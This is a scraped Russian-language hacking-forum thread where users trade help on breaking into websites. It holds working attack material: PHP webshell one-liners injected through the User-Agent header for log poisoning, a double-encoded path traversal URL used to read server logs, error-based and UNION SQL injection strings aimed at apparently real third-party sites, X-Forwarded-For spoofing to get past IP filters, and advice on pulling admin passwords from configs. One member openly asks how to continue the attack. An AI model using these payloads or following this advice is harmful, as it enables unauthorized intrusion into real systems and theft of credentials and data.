Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    IP фильтруется в httpd.conf, X-Forwarded-For в этом случае может помочь? и можно подробнее о нем, а то что-то я не очень понимаю как правильно нужно его использовать.
    Как проверить скачивается или выполняется?

    Phpmyadmin если где-то и есть, то я не нашел его, хотя просканил на папки все, короче в явном виде не доступен.
     
  2. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Некоторые скрипты верят X-Forwarded-For, и можно передать хидер:
    X-Forwarded-For: 1.1.1.1
    Или(если установлен какой-то модуль, название не помню):
    X-Real-IP: 1.1.1.1
    Где 1.1.1.1 это айпи админа.

    Code:
    Как проверить скачивается или выполняется?
    Например ../../var/www/index.php, тебе скачивается файл index.php, в нем есть "<? ?>" ? Или html-код главный страницы?
     
  3. gateout

    gateout New Member

    Joined:
    10 Jul 2012
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    попробовал include в логи apache на тестовом сервере (параметр user-agent). Действительно в логи записалась строчка 10.200.16.52 - - [15/Jul/2012:18:53:50 +0400] "GET /shell2/ HTTP/1.1" 200 54855 "-" <?php eval($_GET[cmd]); ?>, захожу через браузер в http://testsite.comf/shell2/access_log?cmd=phpinfo(); а apache php-скрипт по ходу не отрабатывает, а вываливает содержание лога(то есть в виде текста).
    Может быть я что-то не так сделал?
     
  4. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    мб файлы не инклюдяться, а просто выводиться содержимое?
     
  5. gateout

    gateout New Member

    Joined:
    10 Jul 2012
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    в смысле не инклудяться?в логе же появляется php-скрипт, ток вот через браузер он не выполняется, а просто показывается содержимое лога, включая php-код. Если изменить файл лога на файл с расширением .php php-скрипт отрабатывается.
    Но это я на тестовом сервере могу сделать(переименовать файл), а на удаленном не получится. Там access_log как был так и останется, как же php-скрипт внутри логов исполнить???
     
  6. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Увы это не прокатывает, так как фильтрация идет Апачем

    Ааа в этом плане, нет скачиваются именно исходники, не выполненные, соответственно можно посмотреть все исходники и настройки сервака и.т.д но проблема в том, что узнать то все это можно, но войти с этими данными никуда нельзя из-за фильтрации админок по IP,
    - порты тоже все прикрыты кроме 80 и 443
    - соседних сайтов тоже никаких нет, на серваке только один портал
    - сервисов каких либо тоже нет больше
     
  7. gateout

    gateout New Member

    Joined:
    10 Jul 2012
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    В продолжение:
    нашел такой скрипт со следующим содержанием
    private $prepared_queries = null;
    private $db;

    private function __construct($name)
    {
    $config = BebopConfig::getInstance();
    $cfg_root = 'db.'.$name.'.';
    $this->prepared_queries = array();

    $this->db = new PDO(
    $config->getVar($cfg_root.'dbtype').':'.$config->getVar($cfg_root.'dsn'),
    $config->getVar($cfg_root.'user'),
    $config->getVar($cfg_root.'password')
    );
    $this->db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $this->db->setAttribute(PDO::MYSQL_ATTR_USE_BUFFERED_QUERY, 1);
    $this->db->exec("SET NAMES utf8");
    }

    public static function getInstance($name = 'live')
    {
    if (!array_key_exists($name, self::$instances)) {
    self::$instances[$name] = new PDO_Singleton($name);

    ника не могу определить имя файла, в котором предположительно настройки для подключения к БД хранятся, я так понимаю имя файл начинается с new PDO
     
  8. gateout

    gateout New Member

    Joined:
    10 Jul 2012
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    на сайт в логи apache засунул через User-agent
    <?php echo '<form><input name="cmd" /></form>'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>
    Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fvar%252Flog%252Fapache2%252Fsite.ru_custom.log%2500.jpg
    и вижу содержимое лог файла включая
    91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "<?php echo '<form><input name=\"cmd\" /></form>'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"
    Но php-получается не исполняется. Что делать?
     
    #20768 gateout, 15 Jul 2012
    Last edited: 16 Jul 2012
  9. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    gateout
    Нет PDO расширение для php, интерфейс для доступа с различным базам данных
     
  10. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    gateout
    >new PDO
    Это создание нового объекта. Смотри функцию getVar.
    >php-получается не исполняется
    Уверен, что у тебя инклуд, а не обычное чтение файлов?
     
  11. jasp3r

    jasp3r New Member

    Joined:
    23 Apr 2012
    Messages:
    44
    Likes Received:
    4
    Reputations:
    0
    в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.

    вот сама xss
     
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Ты спалил URL :D

    Я тоже попробывал проинклюдить логи, но там не инклюд, а читалка. Теперь читай конфиги => phpmyadmin => пароль админа => admin.твой_сайт.ru.
     
  13. gateout

    gateout New Member

    Joined:
    10 Jul 2012
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Да, я понял, что не include (к сожалению поздновато). посмотрю по поводу phpMyadmin. Подправил сообщение с сайтом)промашка вышла, спасибо.
     
    #20773 gateout, 16 Jul 2012
    Last edited: 16 Jul 2012
  14. ex'pert

    ex'pert New Member

    Joined:
    28 May 2011
    Messages:
    19
    Likes Received:
    3
    Reputations:
    -3
    Подскажите что можно сделать при найденном sql выдало ошибку:
    Code:
    Script: /index.php 
    Line: 138 
    Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key' 
    in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'' 
    
    
     
  15. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Взломать!
     
    2 people like this.
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Доработать скрипт, поставить фильтрации, сделать какую нить систему логов которая при ошибках админу давала знать о выявленых ошибках, смотря с какой стороны тут посмотреть)))
     
    _________________________
  17. gateout

    gateout New Member

    Joined:
    10 Jul 2012
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?
    то есть исходные данные:
    1) есть читалка, то есть могу прочитать данный из файлов на сервере.
    2) есть phpinfo
    3) есть параметры подключения к БД,
    как продолжить атаку?
     
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Читай сорцы двига, ищи еще баги
     
    _________________________
  19. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Не могу обойти WAF...

    - OK но не выводит

    - 403

    - OK но не выводит

    Вопрос: как обойти?
     
  20. a.dimka

    a.dimka Member

    Joined:
    14 Dec 2011
    Messages:
    0
    Likes Received:
    10
    Reputations:
    3

    http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1'+union%23%0aselect+1,2,3,4,5,6,7,8,9,10,11,12,13--+f

    там string, кавычку не убирай.
     
    1 person likes this.
Thread Status:
Not open for further replies.